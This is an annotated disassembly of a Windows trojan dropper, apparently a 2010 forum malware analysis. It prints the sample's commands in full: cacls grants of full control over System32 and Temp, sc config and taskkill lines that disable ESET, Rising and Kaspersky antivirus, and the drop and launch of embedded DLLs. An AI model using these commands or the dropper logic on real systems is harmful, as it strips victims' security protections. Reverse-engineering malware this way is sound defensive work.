//------------------------------------------------------------------------------
// 1. Check infection -- fuck_trojan
// 2. kill AV -- NOD32 RSing KAV according to time
// 3. Create 2 dll files from resources (one encrypted,the other one not)
// 4. call two functions exported by 2 dll files
//------------------------------------------------------------------------------
////////////////////////////////////////////////////////////////////////////////
//
//------------------------------------------------------------------------------
// Malware Original Entry Point
//------------------------------------------------------------------------------
//
0040118C 55 PUSH EBP
0040118D 8BEC MOV EBP,ESP
0040118F 81EC 000B0000 SUB ESP,0B00
//------------------------------------------------------------------------------
// check infection -- fuck_trojan ,if not , mark this pc firstly
//------------------------------------------------------------------------------
00401195 56 PUSH ESI
00401196 BE 88364000 MOV ESI,00403688 ; ASCII "fuck_trojan"
0040119B 57 PUSH EDI
0040119C 56 PUSH ESI
0040119D FF15 50204000 CALL [402050] ; kernel32.GlobalFindAtomA(fuck_trojan)
004011A3 66:85C0 TEST AX,AX
004011A6 77 13 JA SHORT 004011BB
004011A8 33FF XOR EDI,EDI
004011AA 56 PUSH ESI
004011AB 57 PUSH EDI
004011AC 68 01001F00 PUSH 1F0001
004011B1 FF15 4C204000 CALL [40204C] ; kernel32.OpenMutexA fuck_trojan
004011B7 85C0 TEST EAX,EAX
004011B9 74 07 JE SHORT 004011C2
004011BB 33C0 XOR EAX,EAX
004011BD E9 B2030000 JMP 00401574
004011C2 53 PUSH EBX
004011C3 56 PUSH ESI
004011C4 FF15 48204000 CALL [402048] ; kernel32.GlobalAddAtomA fuck_trojan
004011CA 56 PUSH ESI
004011CB 57 PUSH EDI
004011CC 57 PUSH EDI
004011CD FF15 44204000 CALL [402044] ; kernel32.CreateMutexA - fuck_trojan
//------------------------------------------------------------------------------
// Get the year,and if it's after 2007 now,go to kill Av
//------------------------------------------------------------------------------
004011D3 8D45 F0 LEA EAX,[EBP-10]
004011D6 50 PUSH EAX
004011D7 FF15 24204000 CALL [402024] ; kernel32.GetSystemTime
004011DD 66:817D F0 D707 CMP WORD PTR [EBP-10],7D7 ; 2007=7D7
004011E3 8B3D 60204000 MOV EDI,[402060] ; MSVCRT.sprintf
004011E9 8B1D 40204000 MOV EBX,[402040] ; kernel32.WinExec
004011EF BE 04010000 MOV ESI,104
004011F4 0F86 31010000 JBE 0040132B
//------------------------------------------------------------------------------
// Edit ACLs of %SystemRoot% Directory --> Full Control
//------------------------------------------------------------------------------
004011FA 8D85 ECFEFFFF LEA EAX,[EBP-114]
00401200 56 PUSH ESI
00401201 50 PUSH EAX
00401202 FF15 10204000 CALL [402010] ; kernel32.GetSystemDirectoryA
00401208 8D85 ECFEFFFF LEA EAX,[EBP-114]
0040120E 50 PUSH EAX
0040120F 8D85 E8FDFFFF LEA EAX,[EBP-218]
00401215 68 64364000 PUSH 00403664 ; ASCII "cmd /c cacls %s /e /p everyone:f"
0040121A 50 PUSH EAX
0040121B FFD7 CALL EDI ;sprintf cmd /c cacls SystemDirectory /e /p everyone:f
0040121D 83C4 0C ADD ESP,0C
00401220 8D85 E8FDFFFF LEA EAX,[EBP-218]
00401226 6A 00 PUSH 0
00401228 50 PUSH EAX
00401229 FFD3 CALL EBX ; WinExec(SW_HIDE) cmd /c cacls SystemDirectory /e /p everyone:f
//------------------------------------------------------------------------------
// Edit ACLs of %Temp% Directory --> Full Control
//------------------------------------------------------------------------------
0040122B 8D85 ECFEFFFF LEA EAX,[EBP-114]
00401231 50 PUSH EAX
00401232 56 PUSH ESI
00401233 FF15 3C204000 CALL [40203C] ; kernel32.GetTempPathA
00401239 8D85 ECFEFFFF LEA EAX,[EBP-114]
0040123F 50 PUSH EAX
00401240 8D85 E8FDFFFF LEA EAX,[EBP-218]
00401246 68 40364000 PUSH 00403640 ; ASCII "cmd /c cacls ""%s"" /e /p everyone:f"
0040124B 50 PUSH EAX
0040124C FFD7 CALL EDI ; sprintf
0040124E 83C4 0C ADD ESP,0C
00401251 8D85 E8FDFFFF LEA EAX,[EBP-218]
00401257 6A 00 PUSH 0
00401259 50 PUSH EAX
0040125A FFD3 CALL EBX ;WinExec(SW_HIDE) "cmd /c cacls %TEMP% /e /p everyone:f"
0040125C 8D85 ECFEFFFF LEA EAX,[EBP-114]
00401262 50 PUSH EAX
00401263 56 PUSH ESI
00401264 FF15 3C204000 CALL [40203C] ; kernel32.GetTempPathA
0040126A 8D85 ECFEFFFF LEA EAX,[EBP-114]
00401270 50 PUSH EAX
//------------------------------------------------------------------------------
// disable the service(ekrn) of ESET NOD32
// "cmd /c sc config ekrn start= disabled"
//------------------------------------------------------------------------------
00401271 8D85 E8FDFFFF LEA EAX,[EBP-218]
00401277 68 18364000 PUSH 00403618 ; ASCII "cmd /c sc config ekrn start= disabled"
0040127C 50 PUSH EAX
0040127D FFD7 CALL EDI ; sprintf
0040127F 83C4 0C ADD ESP,0C
00401282 8D85 E8FDFFFF LEA EAX,[EBP-218]
00401288 6A 00 PUSH 0
0040128A 50 PUSH EAX
0040128B FFD3 CALL EBX ; WinExec
0040128D 8D85 ECFEFFFF LEA EAX,[EBP-114]
00401293 50 PUSH EAX
00401294 56 PUSH ESI
00401295 FF15 3C204000 CALL [40203C] ; kernel32.GetTempPathA
0040129B 8D85 ECFEFFFF LEA EAX,[EBP-114]
004012A1 50 PUSH EAX
//------------------------------------------------------------------------------
// kill the process(ekrn.exe) of ESET NOD32
// cmd /c taskkill /im ekrn.exe /f
//------------------------------------------------------------------------------
004012A2 8D85 E8FDFFFF LEA EAX,[EBP-218]
004012A8 68 F8354000 PUSH 004035F8 ; ASCII "cmd /c taskkill /im ekrn.exe /f"
004012AD 50 PUSH EAX
004012AE FFD7 CALL EDI ; sprintf
004012B0 83C4 0C ADD ESP,0C
004012B3 8D85 E8FDFFFF LEA EAX,[EBP-218]
004012B9 6A 00 PUSH 0
004012BB 50 PUSH EAX
004012BC FFD3 CALL EBX ; WinExec
004012BE 8D85 ECFEFFFF LEA EAX,[EBP-114]
004012C4 50 PUSH EAX
004012C5 56 PUSH ESI
004012C6 FF15 3C204000 CALL [40203C] ; kernel32.GetTempPathA
004012CC 8D85 ECFEFFFF LEA EAX,[EBP-114]
004012D2 50 PUSH EAX
//------------------------------------------------------------------------------
// kill the process(egui.exe) of ESET NOD32
// cmd /c taskkill /im egui.exe /f
//------------------------------------------------------------------------------
004012D3 8D85 E8FDFFFF LEA EAX,[EBP-218]
004012D9 68 D8354000 PUSH 004035D8 ; ASCII "cmd /c taskkill /im egui.exe /f"
004012DE 50 PUSH EAX
004012DF FFD7 CALL EDI
004012E1 83C4 0C ADD ESP,0C
004012E4 8D85 E8FDFFFF LEA EAX,[EBP-218]
004012EA 6A 00 PUSH 0
004012EC 50 PUSH EAX
004012ED FFD3 CALL EBX
004012EF 8D85 ECFEFFFF LEA EAX,[EBP-114]
004012F5 50 PUSH EAX
004012F6 56 PUSH ESI
004012F7 FF15 3C204000 CALL [40203C] ; kernel32.GetTempPathA
004012FD 8D85 ECFEFFFF LEA EAX,[EBP-114]
00401303 50 PUSH EAX
//------------------------------------------------------------------------------
// kill the process(ScanFrm.exe) of Rsing
// cmd /c taskkill /im ScanFrm.exe /f
//------------------------------------------------------------------------------
00401304 8D85 E8FDFFFF LEA EAX,[EBP-218]
0040130A 68 B4354000 PUSH 004035B4 ; ASCII "cmd /c taskkill /im ScanFrm.exe /f"
0040130F 50 PUSH EAX
00401310 FFD7 CALL EDI ; sprintf
00401312 83C4 0C ADD ESP,0C
00401315 8D85 E8FDFFFF LEA EAX,[EBP-218]
0040131B 6A 00 PUSH 0
0040131D 50 PUSH EAX
0040131E FFD3 CALL EBX ; WinExec
00401320 68 88130000 PUSH 1388
00401325 FF15 38204000 CALL [402038] ; kernel32.Sleep // strcat %windows% + \system32\killkb.dll
0040132B 8D85 E4FCFFFF LEA EAX,[EBP-31C]
00401331 56 PUSH ESI
00401332 50 PUSH EAX
00401333 FF15 34204000 CALL [402034] ; kernel32.GetWindowsDirectoryA
00401339 8D85 E4FCFFFF LEA EAX,[EBP-31C]
0040133F 68 9C354000 PUSH 0040359C ; ASCII "\system32\killkb.dll"
00401344 50 PUSH EAX
00401345 E8 3A020000 CALL 00401584 ; "c:\windows\\system32\killkb.dll" MSVCRT.strcat
//------------------------------------------------------------------------------
// check the year,if its before 2007 nown,skip the follows
// and goto 0040138D
//------------------------------------------------------------------------------
0040134A 66:817D F0 D707 CMP WORD PTR [EBP-10],7D7
00401350 59 POP ECX
00401351 59 POP ECX
00401352 76 39 JBE SHORT 0040138D
//------------------------------------------------------------------------------
// after 2007
// WriteReSourceToFile"("BIN","95","%windows% + \system32\killkb.dll")
// exec rundll32.exe "%windows% + \system32\killkb.dll", droqp
//------------------------------------------------------------------------------
00401354 8D85 E4FCFFFF LEA EAX,[EBP-31C] ; %windows% + \system32\killkb.dll
0040135A 50 PUSH EAX
0040135B 68 98354000 PUSH 00403598 ; ASCII "BIN"
00401360 68 95000000 PUSH 95
00401365 E8 96FCFFFF CALL 00401000 ; WriteReSourceToFile"("BIN","95",%windows% + \system32\killkb.dll") )
// rundll32.exe "%windows% + \system32\killkb.dll", droqp
0040136A 8D85 E4FCFFFF LEA EAX,[EBP-31C]
00401370 50 PUSH EAX
00401371 8D85 00F5FFFF LEA EAX,[EBP-B00]
00401377 68 80354000 PUSH 00403580 ; ASCII "rundll32.exe %s, droqp"
0040137C 50 PUSH EAX
0040137D FFD7 CALL EDI ; sprintf
0040137F 83C4 18 ADD ESP,18
00401382 8D85 00F5FFFF LEA EAX,[EBP-B00]
00401388 6A 00 PUSH 0
0040138A 50 PUSH EAX
0040138B FFD3 CALL EBX ; WinExec(""rundll32.exe "%windows% + \system32\killkb.dll", droqp",SW_HIDE)
//------------------------------------------------------------------------------
// for all (befor and after 2007)
//------------------------------------------------------------------------------
0040138D 68 88130000 PUSH 1388
00401392 FF15 38204000 CALL [402038] ; kernel32.Sleep
00401398 8D85 ECFEFFFF LEA EAX,[EBP-114]
0040139E 50 PUSH EAX
0040139F 56 PUSH ESI
004013A0 FF15 3C204000 CALL [40203C] ; kernel32.GetTempPathA
//------------------------------------------------------------------------------
// disable the service(avp) of kav
// cmd /c sc config avp start= disabled
//------------------------------------------------------------------------------
004013A6 8D85 ECFEFFFF LEA EAX,[EBP-114]
004013AC 50 PUSH EAX
004013AD 8D85 E8FDFFFF LEA EAX,[EBP-218]
004013B3 68 58354000 PUSH 00403558 ; ASCII "cmd /c sc config avp start= disabled"
004013B8 50 PUSH EAX
004013B9 FFD7 CALL EDI ; sprintf
004013BB 83C4 0C ADD ESP,0C
004013BE 8D85 E8FDFFFF LEA EAX,[EBP-218]
004013C4 6A 00 PUSH 0
004013C6 50 PUSH EAX
004013C7 FFD3 CALL EBX ; WinExec
//------------------------------------------------------------------------------
// kill the process(avp.exe) of kav
// cmd /c taskkill /im avp.exe /f
//------------------------------------------------------------------------------
004013C9 8D85 ECFEFFFF LEA EAX,[EBP-114]
004013CF 50 PUSH EAX
004013D0 56 PUSH ESI
004013D1 FF15 3C204000 CALL [40203C] ; kernel32.GetTempPathA
004013D7 8D85 ECFEFFFF LEA EAX,[EBP-114]
004013DD 50 PUSH EAX
004013DE 8D85 E8FDFFFF LEA EAX,[EBP-218]
004013E4 68 38354000 PUSH 00403538 ; ASCII "cmd /c taskkill /im avp.exe /f"
004013E9 50 PUSH EAX
004013EA FFD7 CALL EDI ; sprintf
004013EC 83C4 0C ADD ESP,0C
004013EF 8D85 E8FDFFFF LEA EAX,[EBP-218]
004013F5 6A 00 PUSH 0
004013F7 50 PUSH EAX
004013F8 FFD3 CALL EBX ; WinExec
004013FA 8B3D 38204000 MOV EDI,[402038] ; kernel32.Sleep
00401400 68 88130000 PUSH 1388
00401405 FFD7 CALL EDI
//------------------------------------------------------------------------------
// write file c:\WINDOSupdate.dll from resource
// WriteEncryptedReSourceToFileWithAnti(8F,"BIN","c:\WINDOWSupdate.dll")
//------------------------------------------------------------------------------
00401407 8D85 E4FCFFFF LEA EAX,[EBP-31C]
0040140D 56 PUSH ESI
0040140E 50 PUSH EAX
0040140F FF15 34204000 CALL [402034] ; kernel32.GetWindowsDirectoryA
// strcat %windows% + \system32\update.dll
00401415 8D85 E4FCFFFF LEA EAX,[EBP-31C]
0040141B 68 2C354000 PUSH 0040352C ; ASCII "update.dll"
00401420 50 PUSH EAX
00401421 E8 5E010000 CALL 00401584 ; MSVCRT.strcat
00401426 8B1D 10204000 MOV EBX,[402010]
0040142C 59 POP ECX
0040142D 59 POP ECX
0040142E 8D85 E0FBFFFF LEA EAX,[EBP-420]
00401434 56 PUSH ESI
00401435 50 PUSH EAX
00401436 FFD3 CALL EBX ; kernel32.GetSystemDirectoryA
00401438 8D85 E0FBFFFF LEA EAX,[EBP-420]
0040143E 56 PUSH ESI
0040143F 50 PUSH EAX
00401440 FFD3 CALL EBX ; kernel32.GetSystemDirectoryA
00401442 8D85 E0FBFFFF LEA EAX,[EBP-420]
00401448 56 PUSH ESI
00401449 50 PUSH EAX
0040144A 6A 00 PUSH 0
0040144C FF15 30204000 CALL [402030] ; kernel32.GetModuleFileNameA
00401452 8D85 E4FCFFFF LEA EAX,[EBP-31C]
00401458 50 PUSH EAX
00401459 68 98354000 PUSH 00403598 ; ASCII "BIN"
0040145E 68 8F000000 PUSH 8F
00401463 E8 44FCFFFF CALL 004010AC ; WriteEncryptedReSourceToFileWithAnti(8F,"BIN","c:\WINDOWSupdate.dll")
// copy module file name
00401468 6A 00 PUSH 0
0040146A 8D85 04F6FFFF LEA EAX,[EBP-9FC]
00401470 68 DC050000 PUSH 5DC
00401475 50 PUSH EAX
00401476 E8 03010000 CALL 0040157E ; JMP to MSVCRT.memset
0040147B 8D85 E0FBFFFF LEA EAX,[EBP-420]
00401481 50 PUSH EAX
00401482 8D85 04F6FFFF LEA EAX,[EBP-9FC]
00401488 50 PUSH EAX
00401489 E8 EA000000 CALL 00401578 ; JMP to MSVCRT.strcpy
// ModuleFileName + "_"
0040148E BE 28354000 MOV ESI,00403528
00401493 8D85 04F6FFFF LEA EAX,[EBP-9FC]
00401499 56 PUSH ESI
0040149A 50 PUSH EAX
0040149B E8 E4000000 CALL 00401584 ; JMP to MSVCRT.strcat
// ModuleFileName + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo"
004014A0 68 6C324000 PUSH 0040326C ; ASCII "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo"
004014A5 8D85 04F6FFFF LEA EAX,[EBP-9FC]
004014AB 50 PUSH EAX
004014AC E8 D3000000 CALL 00401584 ; JMP to MSVCRT.strcat
// ModuleFileName + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo"
// + "_"
004014B1 8D85 04F6FFFF LEA EAX,[EBP-9FC]
004014B7 56 PUSH ESI
004014B8 50 PUSH EAX
004014B9 E8 C6000000 CALL 00401584 ; JMP to MSVCRT.strcat
// ModuleFileName + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo"
// + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo"
004014BE 8D85 04F6FFFF LEA EAX,[EBP-9FC]
004014C4 68 10324000 PUSH 00403210 ; ASCII "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo"
004014C9 50 PUSH EAX
004014CA E8 B5000000 CALL 00401584 ; JMP to MSVCRT.strcat
// ModuleFileName + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo"
// + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo" + "_"
004014CF 83C4 40 ADD ESP,40
004014D2 8D85 04F6FFFF LEA EAX,[EBP-9FC]
004014D8 56 PUSH ESI
004014D9 50 PUSH EAX
004014DA E8 A5000000 CALL 00401584 ; JMP to MSVCRT.strcat
// ModuleFileName + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo"
// + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo" + "_" + NULL
004014DF 8D85 04F6FFFF LEA EAX,[EBP-9FC]
004014E5 68 08304000 PUSH 00403008
004014EA 50 PUSH EAX
004014EB E8 94000000 CALL 00401584 ; JMP to MSVCRT.strcat
// LoadLibrary("c:\WINDOWSupdate.dll")
004014F0 83C4 10 ADD ESP,10
004014F3 8D85 E4FCFFFF LEA EAX,[EBP-31C]
004014F9 50 PUSH EAX
004014FA FF15 2C204000 CALL [40202C] ; kernel32.LoadLibraryA
// GetProcAddress("Scan","c:\WINDOWSupdate.dll")
00401500 85C0 TEST EAX,EAX
00401502 74 24 JE SHORT 00401528
00401504 68 00304000 PUSH 00403000 ; ASCII "Scan"
00401509 50 PUSH EAX
0040150A FF15 28204000 CALL [402028] ; kernel32.GetProcAddress
// call WINDOWSupdate.dll::Scan(0,0,
// ModuleFileName + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo"
// + "_" + "o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo" + "_" + NULL
// )
00401510 85C0 TEST EAX,EAX
00401512 74 0D JE SHORT 00401521
00401514 8D8D 04F6FFFF LEA ECX,[EBP-9FC]
0040151A 51 PUSH ECX
0040151B 6A 00 PUSH 0
0040151D 6A 00 PUSH 0
0040151F FFD0 CALL EAX ; WINDOWSupdate.dll::Scan
00401521 68 0046C323 PUSH 23C34600
00401526 FFD7 CALL EDI ; Sleep()
00401528 BE 90010000 MOV ESI,190
0040152D 8D85 04F6FFFF LEA EAX,[EBP-9FC]
00401533 56 PUSH ESI
00401534 50 PUSH EAX
00401535 FFD3 CALL EBX ; GetSystemDirectory
00401537 8D85 04F6FFFF LEA EAX,[EBP-9FC]
0040153D 56 PUSH ESI
0040153E 50 PUSH EAX
0040153F FFD3 CALL EBX ; GetSystemDirectory
// check the year 2008,if its before 2008 now,goto exit
00401541 66:817D F0 D807 CMP WORD PTR [EBP-10],7D8
00401547 76 28 JBE SHORT 00401571
// .........
00401549 8D85 04F6FFFF LEA EAX,[EBP-9FC]
0040154F 56 PUSH ESI
00401550 50 PUSH EAX
00401551 FFD3 CALL EBX ; GetSystemDirectory
00401553 8D85 04F6FFFF LEA EAX,[EBP-9FC]
00401559 56 PUSH ESI
0040155A 50 PUSH EAX
0040155B FFD3 CALL EBX ; GetSystemDirectory
0040155D 8D85 04F6FFFF LEA EAX,[EBP-9FC]
00401563 56 PUSH ESI
00401564 50 PUSH EAX
00401565 FFD3 CALL EBX ; GetSystemDirectory
00401567 8D85 04F6FFFF LEA EAX,[EBP-9FC]
0040156D 56 PUSH ESI
0040156E 50 PUSH EAX
0040156F FFD3 CALL EBX ; GetSystemDirectory
00401571 33C0 XOR EAX,EAX
00401573 5B POP EBX
00401574 5F POP EDI
00401575 5E POP ESI
00401576 C9 LEAVE
00401577 C3 RET
//------------------------------------------------------------------------------
// WriteReSourceToFile(ResourceName,ResourceType,FilePath)
//------------------------------------------------------------------------------
00401000 55 PUSH EBP
00401001 8BEC MOV EBP,ESP
00401003 81EC 10010000 SUB ESP,110
00401009 53 PUSH EBX
0040100A 33DB XOR EBX,EBX
0040100C FF75 0C PUSH DWORD PTR [EBP+C]
0040100F FF75 08 PUSH DWORD PTR [EBP+8]
00401012 53 PUSH EBX
00401013 FF15 20204000 CALL [402020] ; kernel32.FindResourceA(hModule=NULL,ResourceName="95,"ResourceType="BIN")
00401019 50 PUSH EAX
0040101A 53 PUSH EBX
0040101B 8945 08 MOV [EBP+8],EAX
0040101E FF15 1C204000 CALL [40201C] ; kernel32.LoadResource(hModule=NULL,hResource=handle)
00401024 50 PUSH EAX
00401025 8945 FC MOV [EBP-4],EAX
00401028 FF15 18204000 CALL [402018] ; kernel32.SetHandleCount
0040102E 53 PUSH EBX
0040102F 53 PUSH EBX
00401030 6A 02 PUSH 2
00401032 53 PUSH EBX
00401033 53 PUSH EBX
00401034 68 00000040 PUSH 40000000
00401039 FF75 10 PUSH DWORD PTR [EBP+10]
0040103C 8945 F8 MOV [EBP-8],EAX
0040103F FF15 14204000 CALL [402014] ; kernel32.CreateFileA(FileName="C:\windows\system32\killkb.dll",Access=GENERIC_WRITE,ShareMOde=0,pSecurity=NULL,Mode=CREATE_ALWAYS,Attributes=0,hTemplateFile=NULL)
//check CreateFile failure
00401045 83F8 FF CMP EAX,-1
00401048 8945 0C MOV [EBP+C],EAX ; FileHandle
0040104B 74 43 JE SHORT 00401090
0040104D 56 PUSH ESI
0040104E 8B35 10204000 MOV ESI,[402010]
00401054 57 PUSH EDI
00401055 BF 04010000 MOV EDI,104
0040105A 8D85 F0FEFFFF LEA EAX,[EBP-110]
00401060 57 PUSH EDI
00401061 50 PUSH EAX
00401062 FFD6 CALL ESI ; kernel32.GetSystemDirectoryA
00401064 8D85 F0FEFFFF LEA EAX,[EBP-110]
0040106A 57 PUSH EDI
0040106B 50 PUSH EAX
0040106C FFD6 CALL ESI ; kernel32.GetSystemDirectoryA
0040106E 8D45 F4 LEA EAX,[EBP-C]
00401071 53 PUSH EBX
00401072 50 PUSH EAX
00401073 FF75 08 PUSH DWORD PTR [EBP+8]
00401076 53 PUSH EBX
00401077 FF15 0C204000 CALL [40200C] ; kernel32.SizeofResource
0040107D 50 PUSH EAX
0040107E FF75 F8 PUSH DWORD PTR [EBP-8]
00401081 FF75 0C PUSH DWORD PTR [EBP+C]
00401084 FF15 08204000 CALL [402008] ; kernel32.WriteFile
0040108A 5F POP EDI
0040108B 5E POP ESI
0040108C 85C0 TEST EAX,EAX
0040108E 75 04 JNZ SHORT 00401094
00401090 33C0 XOR EAX,EAX
00401092 EB 15 JMP SHORT 004010A9
00401094 FF75 0C PUSH DWORD PTR [EBP+C]
00401097 FF15 04204000 CALL [402004] ; kernel32.CloseHandle
0040109D FF75 FC PUSH DWORD PTR [EBP-4]
004010A0 FF15 00204000 CALL [402000] ; kernel32.FreeResource
004010A6 6A 01 PUSH 1
004010A8 58 POP EAX
004010A9 5B POP EBX
004010AA C9 LEAVE
004010AB C3 RET
//------------------------------------------------------------------------------
// WriteEncryptedReSourceToFileWithAnti(ResourceName,ResourceType,FilePath)
//------------------------------------------------------------------------------
004010AC 55 PUSH EBP
004010AD 8BEC MOV EBP,ESP
004010AF 81EC 20010000 SUB ESP,120
004010B5 53 PUSH EBX
004010B6 33DB XOR EBX,EBX
004010B8 FF75 0C PUSH DWORD PTR [EBP+C]
004010BB FF75 08 PUSH DWORD PTR [EBP+8]
004010BE 53 PUSH EBX
004010BF FF15 20204000 CALL [402020] ; kernel32.FindResourceA(NULL,8F,"BIN")
004010C5 50 PUSH EAX
004010C6 53 PUSH EBX
004010C7 8945 08 MOV [EBP+8],EAX
004010CA FF15 1C204000 CALL [40201C] ; kernel32.LoadResource
004010D0 50 PUSH EAX
004010D1 8945 F8 MOV [EBP-8],EAX
004010D4 FF15 18204000 CALL [402018] ; kernel32.SetHandleCount
004010DA 53 PUSH EBX
004010DB 53 PUSH EBX
004010DC 6A 02 PUSH 2
004010DE 53 PUSH EBX
004010DF 53 PUSH EBX
004010E0 68 00000040 PUSH 40000000
004010E5 FF75 10 PUSH DWORD PTR [EBP+10]
004010E8 8945 FC MOV [EBP-4],EAX
004010EB FF15 14204000 CALL [402014] ; kernel32.CreateFileA("c:\WINDOWSupdate.dll",GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL)
// check failure
004010F1 83F8 FF CMP EAX,-1
004010F4 8945 10 MOV [EBP+10],EAX
004010F7 75 07 JNZ SHORT 00401100
004010F9 33C0 XOR EAX,EAX
004010FB E9 89000000 JMP 00401189
00401100 8D45 E4 LEA EAX,[EBP-1C]
00401103 50 PUSH EAX
00401104 FF15 24204000 CALL [402024] ; kernel32.GetSystemTime
// check the year 2007
0040110A 66:817D E4 D707 CMP WORD PTR [EBP-1C],7D7
00401110 76 62 JBE SHORT 00401174
00401112 56 PUSH ESI
00401113 8B35 10204000 MOV ESI,[402010]
00401119 57 PUSH EDI
0040111A BF 04010000 MOV EDI,104
0040111F 8D85 E0FEFFFF LEA EAX,[EBP-120]
00401125 57 PUSH EDI
00401126 50 PUSH EAX
00401127 885D 0F MOV [EBP+F],BL
0040112A FFD6 CALL ESI ; kernel32.GetSystemDirectoryA
0040112C 8D85 E0FEFFFF LEA EAX,[EBP-120]
00401132 57 PUSH EDI
00401133 50 PUSH EAX
00401134 FFD6 CALL ESI ; kernel32.GetSystemDirectoryA
00401136 FF75 08 PUSH DWORD PTR [EBP+8]
00401139 8B35 0C204000 MOV ESI,[40200C]
0040113F 33FF XOR EDI,EDI
00401141 53 PUSH EBX
00401142 FFD6 CALL ESI ; kernel32.SizeofResource
00401144 85C0 TEST EAX,EAX
00401146 76 2A JBE SHORT 00401172
//------------------------------------------------------------------------------
// write file loop , 1 byte once
//------------------------------------------------------------------------------
00401148 8B45 FC MOV EAX,[EBP-4]
0040114B 53 PUSH EBX
// decode
0040114C 8A0407 MOV AL,[EDI+EAX]
0040114F FEC0 INC AL
00401151 8845 0F MOV [EBP+F],AL
00401154 8D45 F4 LEA EAX,[EBP-C]
00401157 50 PUSH EAX
00401158 8D45 0F LEA EAX,[EBP+F]
0040115B 6A 01 PUSH 1
0040115D 50 PUSH EAX
0040115E FF75 10 PUSH DWORD PTR [EBP+10]
00401161 FF15 08204000 CALL [402008] ; kernel32.WriteFile(hFile,pBuffer,nBytesToWrite=1,pBytesWritten,NULL)
00401167 FF75 08 PUSH DWORD PTR [EBP+8]
// ++
0040116A 47 INC EDI
0040116B 53 PUSH EBX
0040116C FFD6 CALL ESI ; SizeOfResource
// check the end
0040116E 3BF8 CMP EDI,EAX
00401170 ^ 72 D6 JB SHORT 00401148
//
00401172 5F POP EDI
00401173 5E POP ESI
00401174 FF75 10 PUSH DWORD PTR [EBP+10]
00401177 FF15 04204000 CALL [402004] ; kernel32.CloseHandle
0040117D FF75 F8 PUSH DWORD PTR [EBP-8]
00401180 FF15 00204000 CALL [402000] ; kernel32.FreeResource
00401186 6A 01 PUSH 1
00401188 58 POP EAX
00401189 5B POP EBX
0040118A C9 LEAVE
0040118B C3 RET
00401578 - FF25 64204000 JMP [402064] ; MSVCRT.strcpy
0040157E - FF25 58204000 JMP [402058] ; MSVCRT.memset
00401584 - FF25 5C204000 JMP [40205C] ; MSVCRT.strcat
[复制链接]
发表于 2010-2-25 14:24
发表于 2010-2-25 14:41
